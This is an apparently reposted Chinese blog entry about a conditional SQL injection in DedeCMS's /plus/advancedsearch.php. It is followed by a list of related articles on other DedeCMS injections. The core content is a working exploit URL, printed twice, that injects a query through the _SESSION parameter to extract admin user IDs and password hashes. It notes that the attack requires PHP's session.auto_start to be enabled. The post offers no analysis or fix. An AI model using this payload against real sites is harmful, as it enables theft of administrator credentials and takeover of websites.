dedecms有条件sql注入(x0day)
2016-08-29 23:45
113 查看
https://www.t00ls.net/thread-35569-1-1.html
http://localhost/dedecms/plus/advancedsearch.php?mid=1&_SESSION[123]=select concat(0x7c,userid,0x7c,pwd,0x7c) as aid from `%23@__admin` aaa &sqlhash=123
条件利用:
1.漏洞代码在/plus/advancedsearch.php 文件中
2.是一个sql注入的漏洞
3.php要开启session.auto_start = 1
4.漏洞存在和session有关
http://localhost/dedecms/plus/advancedsearch.php?mid=1&_SESSION[123]=select concat(0x7c,userid,0x7c,pwd,0x7c) as aid from `%23@__admin` aaa &sqlhash=123
条件利用:
1.漏洞代码在/plus/advancedsearch.php 文件中
2.是一个sql注入的漏洞
3.php要开启session.auto_start = 1
4.漏洞存在和session有关
相关文章推荐
- DEDECMS 5.7之前版本远程SQL注入漏洞
- 织梦(dedecms) 5.7 /plus/car.php sql注入0day
- DedeCMS另一处全版本通杀SQL注入(无限制)
- DEDECMS数据库执行原理、CMS代码层SQL注入防御思路
- dedecms好友描述修改和会员中心收藏删除均存在sql注入漏洞
- DedeCMS group.php SQL注入漏洞
- [分析]-DedeCMS全版本通杀SQL注入漏洞
- Dedecms recommend.php SQL注入漏洞
- Dedecms 搜索模块sql注入
- DedeCMSrecommend.php文件通杀SQL注入漏洞原理分析
- DedeCMS反馈页面SQL注入漏洞
- [分析]-DedeCMS全版本通杀SQL注入漏洞
- DedeCMS全版本通杀SQL注入漏洞利用代码及工具
- DedeCMS全版本通杀SQL注入漏洞利用代码及工具
- DedeCMS全版本通杀SQL注入漏洞利用代码
- dedecms学习经验分享
- 浅谈mybatis中的#和$的区别 以及防止sql注入的方法
- dedecms 导航
- 如何有效防止SQL注入
- Java防止SQL注入的几个途径